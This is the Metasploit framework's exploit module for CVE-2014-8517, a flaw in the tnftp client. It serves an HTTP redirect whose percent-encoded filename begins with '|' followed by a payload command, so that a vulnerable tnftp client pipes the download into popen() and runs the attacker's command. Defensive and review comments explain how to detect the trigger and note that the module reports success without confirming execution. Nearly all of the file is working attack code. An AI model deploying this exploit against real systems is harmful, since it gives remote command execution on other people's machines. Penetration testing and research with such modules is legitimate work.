GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/http/tnftp_savefile.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit module for CVE-2014-8517: tnftp derives its output filename
# ("savefile") from the last path component of the fetched resource and, when
# that name starts with "|", hands the fetched data to popen().
#
# Defensive notes, taken from the module's own description and code:
# - The behaviour applies only when tnftp runs without -o, so the client
#   resolves the output filename from the URL rather than from the caller.
# - The trigger is an HTTP redirect whose final path segment decodes to a
#   string beginning with "|"; the segment is sent fully percent-encoded, so
#   inspection has to decode the Location header before matching.
# - A finding is recorded as soon as the client requests the redirected URI;
#   nothing in this class verifies that the command actually ran.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer
  include Msf::Auxiliary::Report

  # Registers the module metadata with the framework.
  #
  # @param info [Hash] metadata supplied by the framework, merged through
  #   update_info with the values below
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'tnftp "savefile" Arbitrary Command Execution',
        'Description' => %q{
          This module exploits an arbitrary command execution vulnerability in
          tnftp's handling of the resolved output filename - called "savefile" in
          the source - from a requested resource.

          If tnftp is executed without the -o command-line option, it will resolve
          the output filename from the last component of the requested resource.

          If the output filename begins with a "|" character, tnftp will pass the
          fetched resource's output to the command directly following the "|"
          character through the use of the popen() function.
        },
        'Author' => [
          'Jared McNeill', # Vulnerability discovery
          'wvu' # Metasploit module
        ],
        'References' => [
          ['CVE', '2014-8517'],
          ['URL', 'https://seclists.org/oss-sec/2014/q4/459']
        ],
        'DisclosureDate' => '2014-10-28',
        'License' => MSF_LICENSE,
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'Privileged' => false,
        # "/" is excluded from the payload; presumably because the client
        # takes only the last path component as the filename - confirm.
        'Payload' => { 'BadChars' => '/' },
        'Targets' => [['ftp(1)', {}]],
        'DefaultTarget' => 0,
        # Reliability, stability and side effects are declared as unknown,
        # i.e. they have not been characterised for this module.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Handles one HTTP request received by the module's web server.
  #
  # Clients whose User-Agent does not match tnftp / NetBSD-ftp get a 404.
  # A matching client is redirected on its first request; once it requests
  # the redirected URI it receives an empty body and a vulnerability record
  # is stored for its address.
  #
  # @param cli the client connection object passed in by HttpServer
  # @param request the parsed HTTP request
  def on_request_uri(cli, request)
    user_agent = request['User-Agent']

    # The User-Agent is client-controlled, so this is a convenience filter
    # and not proof of which client software is connecting.
    unless user_agent =~ /(tn|NetBSD-)ftp/
      print_status("#{user_agent} connected")
      send_not_found(cli)
      return
    end

    unless request.uri.ends_with?(sploit)
      print_status("#{user_agent} connected")
      print_status('Redirecting to exploit...')
      return send_redirect(cli, sploit_uri)
    end

    send_response(cli, '')
    print_good("Executing `#{payload.encoded}'!")
    # NOTE(review): this is recorded on request of the URI alone; a client
    # that follows the redirect without running the command is reported too.
    report_vuln(
      host: cli.peerhost,
      name: name,
      refs: references,
      info: user_agent
    )
  end

  # Builds the redirect target: the module's base URI, with a trailing slash
  # added if missing, followed by the fully percent-encoded filename.
  #
  # @return [String] absolute URI sent in the redirect
  def sploit_uri
    base = get_uri
    base = "#{base}/" unless base.ends_with?('/')
    base + Rex::Text.uri_encode(sploit, 'hex-all')
  end

  # The filename served to the client: a leading "|" followed by the encoded
  # payload command.
  #
  # @return [String]
  def sploit
    "|#{payload.encoded}"
  end
end